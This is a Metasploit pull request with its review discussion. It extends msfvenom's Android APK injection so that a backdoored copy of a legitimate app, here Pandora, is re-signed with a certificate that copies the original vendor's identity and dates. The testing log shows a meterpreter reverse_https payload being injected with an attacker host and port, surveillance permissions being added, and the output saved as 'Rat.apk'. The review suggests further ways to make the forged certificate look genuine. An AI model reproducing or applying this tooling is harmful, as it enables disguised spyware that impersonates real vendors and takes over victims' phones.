### PR TITLE
Create new APK signing certificate with dname value copied from original …

### PR DESCRIPTION
**Pull request by dana-at-cp**
This change creates a new signing certificate, using the dname value copied from the original APK certificate, during the APK injection process.

Here is the legitimate APK that I used for testing:

https://www.dropbox.com/s/jnjq8o41uwxazql/Pandora_7.4.apk?dl=0
## Verification
- [x] Inject an Android payload into a legitimate APK via msfvenom

```
msfdev@ubuntu:~/Code/github/metasploit-framework$ ./msfvenom -x ~/Android/Pandora_7.4.apk -p android/meterpreter/reverse_https LHOST=10.6.9.31 LPORT=443 -o Rat.apk
WARNING: Local file /home/msfdev/Code/github/metasploit-framework/data/android/meterpreter.dex is being used
WARNING: Local files may be incompatible with the Metasploit Framework
WARNING: Local file /home/msfdev/Code/github/metasploit-framework/data/android/apk is being used
WARNING: Local file /home/msfdev/Code/github/metasploit-framework/data/android/apk/classes.dex is being used
Using APK template: /home/msfdev/Android/Pandora_7.4.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.pandora.android
[*] Loading /tmp/d20161017-3191-59ajje/original/smali/com/pandora/android/Main.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding android.permission.CHANGE_WIFI_STATE
[*] Adding android.permission.ACCESS_COURSE_LOCATION
[*] Adding android.permission.ACCESS_FINE_LOCATION
[*] Adding android.permission.SEND_SMS
[*] Adding android.permission.RECEIVE_SMS
[*] Adding android.permission.RECORD_AUDIO
[*] Adding android.permission.CALL_PHONE
[*] Adding android.permission.READ_CONTACTS
[*] Adding android.permission.WRITE_CONTACTS
[*] Adding android.permission.RECORD_AUDIO
[*] Adding android.permission.WRITE_SETTINGS
[*] Adding android.permission.CAMERA
[*] Adding android.permission.READ_SMS
[*] Adding android.permission.SET_WALLPAPER
[*] Adding android.permission.READ_CALL_LOG
[*] Adding android.permission.WRITE_CALL_LOG
[*] Rebuilding /home/msfdev/Android/Pandora_7.4.apk with meterpreter injection as /tmp/d20161017-3191-59ajje/output.apk
[*] Signing /tmp/d20161017-3191-59ajje/output.apk
[*] Aligning /tmp/d20161017-3191-59ajje/output.apk
Payload size: 16693299 bytes
Saved as: Rat.apk
[ruby-2.3.1@metasploit-framework](apkinjectcpcertdname) 
msfdev@ubuntu:~/Code/github/metasploit-framework$
```
- [ ] **Verify** that a new "Creating signing key and keystore.." status message is displayed in the output

```
msfdev@ubuntu:~/Code/github/metasploit-framework$ ./msfvenom -x ~/Android/Pandora_7.4.apk -p android/meterpreter/reverse_https LHOST=10.6.9.31 LPORT=443 -o Rat.apk
Using APK template: /home/msfdev/Android/Pandora_7.4.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
...
[*] Aligning /tmp/d20161017-3191-59ajje/output.apk
Payload size: 16693299 bytes
Saved as: Rat.apk
[ruby-2.3.1@metasploit-framework](apkinjectcpcertdname) 
msfdev@ubuntu:~/Code/github/metasploit-framework$
```
- [ ] **Verify** that the injected APK is properly signed

```
msfdev@ubuntu:~/Code/github/metasploit-framework$ jarsigner -verify -certs Rat.apk
jar verified.

Warning: 
This jar contains entries whose certificate chain is not validated.
This jar contains signatures that does not include a timestamp. Without a timestamp, users may not be able to validate this jar after the signer certificate's expiration date (2044-03-04) or after any future revocation date.

Re-run with the -verbose and -certs options for more details.
[ruby-2.3.1@metasploit-framework](apkinjectcpcertdname) 
msfdev@ubuntu:~/Code/github/metasploit-framework$
```
- [ ] **Verify** that the "Owner" and "Issuer" certificate data in the injected APK matches that of the certificate from the original APK

```
msfdev@ubuntu:~/Code/github/metasploit-framework$ unzip -l ~/Android/Pandora_7.4.apk |grep ".RSA"
      952  2016-07-08 15:41   META-INF/CERT.RSA
[ruby-2.3.1@metasploit-framework](apkinjectcpcertdname) 
msfdev@ubuntu:~/Code/github/metasploit-framework$ unzip -p ~/Android/Pandora_7.4.apk META-INF/CERT.RSA |keytool -printcert
Owner: CN=Pandora, OU=Engineering, O="Pandora Media, Inc.", L=Oakland, ST=CA, C=US
Issuer: CN=Pandora, OU=Engineering, O="Pandora Media, Inc.", L=Oakland, ST=CA, C=US
Serial number: 4a8598e9
Valid from: Fri Aug 14 10:03:37 PDT 2009 until: Wed May 30 10:03:37 PDT 2283
Certificate fingerprints:
     MD5:  34:DF:A6:0C:2C:22:38:6D:25:D6:E6:B3:1D:FF:47:B1
     SHA1: B7:33:57:2A:41:80:BA:BB:B6:2A:6C:9F:5B:28:0B:8F:89:95:2F:D9
     SHA256: E6:22:71:55:59:94:B1:14:34:E4:E3:DF:FF:F8:ED:B3:1C:8B:50:80:C8:3C:06:05:46:C3:8B:1C:C7:24:0C:49
     Signature algorithm name: MD5withRSA
     Version: 1
[ruby-2.3.1@metasploit-framework](apkinjectcpcertdname) 
msfdev@ubuntu:~/Code/github/metasploit-framework$
```

Check injected APK

```
msfdev@ubuntu:~/Code/github/metasploit-framework$ unzip -l Rat.apk |grep ".RSA"
     1380  2016-10-17 07:29   META-INF/SIGNING_.RSA
[ruby-2.3.1@metasploit-framework](apkinjectcpcertdname) 
msfdev@ubuntu:~/Code/github/metasploit-framework$ unzip -p Rat.apk META-INF/SIGNING_.RSA |keytool -printcert
Owner: CN=Pandora, OU=Engineering, O="Pandora Media, Inc.", L=Oakland, ST=CA, C=US
Issuer: CN=Pandora, OU=Engineering, O="Pandora Media, Inc.", L=Oakland, ST=CA, C=US
Serial number: 1085efc0
Valid from: Mon Oct 17 07:28:01 PDT 2016 until: Fri Mar 04 06:28:01 PST 2044
Certificate fingerprints:
     MD5:  1B:BD:9A:B5:4A:6E:1E:9F:C8:16:BC:B5:68:C0:FE:9B
     SHA1: 11:52:D0:DD:75:A3:31:E4:65:7A:AE:7F:3B:61:D4:C7:9A:9D:FC:BD
     SHA256: D1:17:1D:AB:D0:76:DB:62:CF:2D:63:26:7B:E1:6F:18:E2:DC:0A:A6:0A:4B:34:96:EC:96:1E:97:3F:97:EC:A2
     Signature algorithm name: SHA256withRSA
     Version: 3

Extensions: 

#1: ObjectId: 2.5.29.14 Criticality=false
SubjectKeyIdentifier [
KeyIdentifier [
0000: 4C 51 B6 5B 12 C1 E5 53   D1 7A D3 E4 42 8B BF BE  LQ.[...S.z..B...
0010: 02 23 B3 ED                                        .#..
]
]

[ruby-2.3.1@metasploit-framework](apkinjectcpcertdname) 
msfdev@ubuntu:~/Code/github/metasploit-framework$
```

### CODE REVIEW

File: lib/msf/core/payload/apk.rb [hunk 1]
```diff
@@ -95,18 +95,43 @@ def fix_manifest(tempdir)
...
 
-  def backdoor_apk(apkfile, raw_payload)
+  def find_orig_cert_dname(orig_apkfile)
+    unzip_output = run_cmd("unzip -l #{orig_apkfile}")
+    orig_cert_file = unzip_output.match(/[\w\/-]+\.RSA/)[0]
+    bin_cert_data, err, s = Open3.capture3("unzip -p #{orig_apkfile} #{orig_cert_file}")
+    unless s.success?
+      raise RuntimeError, "Failed to find original cert data."
+    end
+    keytool_output, err, s = Open3.capture3("keytool -printcert", :stdin_data=>bin_cert_data, :binmode=>true)
```
Comment (timwr) [inline lib/msf/core/payload/apk.rb]: I think we should use the -jarfile argument of keytool, e.g:
keytool_output = run_cmd("keytool -printcert -jarfile #{orig_apkfile}")
then we can remove the dependency on unzip.

File: lib/msf/core/payload/apk.rb [hunk 2]
```diff
@@ -122,20 +147,20 @@ def backdoor_apk(apkfile, raw_payload)
...
+    keystore = "#{tempdir}/signing.keystore"
+    storepass = "android"
+    keypass = "android"
+    keyalias = "signing.key"
+    orig_cert_dname = find_orig_cert_dname(apkfile)
+
+    print_status "Creating signing key and keystore..\n"
+    run_cmd("keytool -genkey -v -keystore #{keystore} \
+    -alias #{keyalias} -storepass #{storepass} -keypass #{keypass} -keyalg RSA \
+    -keysize 2048 -validity 10000 -dname '#{orig_cert_dname}'")
```
Comment (timwr) [inline lib/msf/core/payload/apk.rb]: We could even can match the certificate start date and validity period. Something like:
```
orig_cert = find_orig_cert(apkfile)
dname = orig_cert[0]
startdate = orig_cert[1].strftime("%Y/%m/%d %H:%M:%S")
validity = (orig_cert[2] - orig_cert[1]) / (24 * 3600 * 1000) #?
run_cmd("keytool -genkey -v -startdate '#{startdate}
```
Annoyingly the dates are in different formats :(

**Comment by timwr** [comment]
This is awesome, many thanks @dana-at-cp !

**Comment by dana-at-cp** [comment]
@timwr I like your suggestions. Let me hack on this a bit more before merging/landing.

**Comment by dana-at-cp** [comment]
@timwr I incorporated your suggestions into the latest commit. It is working well but I think there may be a bug in keytool related to specifying a '-startdate' value. For instance, I confirmed that "2009/08/14 10:03:37" is being passed as the start date value but the time ends up as "10:10:10" instead.

Injected APK cert data:
```
msfdev@ubuntu:~/Code/github/metasploit-framework$ keytool -printcert -jarfile Rat.apk 
Signer #1:

Signature:

Owner: CN=Pandora, OU=Engineering, O="Pandora Media, Inc.", L=Oakland, ST=CA, C=US
Issuer: CN=Pandora, OU=Engineering, O="Pandora Media, Inc.", L=Oakland, ST=CA, C=US
Serial number: 16fdd721
Valid from: Fri Aug 14 10:10:10 PDT 2009 until: Wed May 30 10:10:10 PDT 2283
Certificate fingerprints:
	 MD5:  42:82:A1:A6:C5:A3:E0:BE:95:F6:23:F5:69:41:E8:FA
	 SHA1: E6:5F:F7:25:CB:30:DE:27:07:4C:6B:35:A3:48:4F:C2:CB:44:73:0B
	 SHA256: 3D:14:21:DD:16:C1:5A:4E:25:FC:4C:E5:D7:09:A2:22:66:AA:05:DB:13:F1:25:29:26:E5:6C:23:E4:DC:6A:AB
	 Signature algorithm name: SHA256withRSA
	 Version: 3

Extensions: 

#1: ObjectId: 2.5.29.14 Criticality=false
SubjectKeyIdentifier [
KeyIdentifier [
0000: 42 B1 40 13 AD 6C BC 98   70 39 B1 F1 3E 27 93 B2  B.@..l..p9..>'..
0010: B0 1D DD 67                                        ...g
]
]


[ruby-2.3.1@metasploit-framework](apkinjectcpcertdname) 
msfdev@ubuntu:~/Code/github/metasploit-framework$
```

Original APK cert date:
```
msfdev@ubuntu:~/Code/github/metasploit-framework$ keytool -printcert -jarfile ~/Android/Pandora_7.4.apk 
Signer #1:

Signature:

Owner: CN=Pandora, OU=Engineering, O="Pandora Media, Inc.", L=Oakland, ST=CA, C=US
Issuer: CN=Pandora, OU=Engineering, O="Pandora Media, Inc.", L=Oakland, ST=CA, C=US
Serial number: 4a8598e9
Valid from: Fri Aug 14 10:03:37 PDT 2009 until: Wed May 30 10:03:37 PDT 2283
Certificate fingerprints:
	 MD5:  34:DF:A6:0C:2C:22:38:6D:25:D6:E6:B3:1D:FF:47:B1
	 SHA1: B7:33:57:2A:41:80:BA:BB:B6:2A:6C:9F:5B:28:0B:8F:89:95:2F:D9
	 SHA256: E6:22:71:55:59:94:B1:14:34:E4:E3:DF:FF:F8:ED:B3:1C:8B:50:80:C8:3C:06:05:46:C3:8B:1C:C7:24:0C:49
	 Signature algorithm name: MD5withRSA
	 Version: 1

[ruby-2.3.1@metasploit-framework](apkinjectcpcertdname) 
msfdev@ubuntu:~/Code/github/metasploit-framework$
```

**Comment by dana-at-cp** [comment]
@timwr Here's the bug in openjdk:

https://bugs.openjdk.java.net/browse/JDK-8141411

**Comment by timwr** [comment]
Awesome @dana-at-cp , many thanks!
Shame about the JDK bug:
https://github.com/openjdk-mirror/jdk/blob/jdk8u/jdk8u/master/src/share/classes/sun/security/tools/keytool/Main.java#L3586
I might try send a pull request
Thanks again

**Comment by tdoan-r7** [comment]
# Release Notes

Changes have been made so that a new signing certificate is created, using the dname value copied from the original APK certificate, during the APK injection process.

**Pull request merged**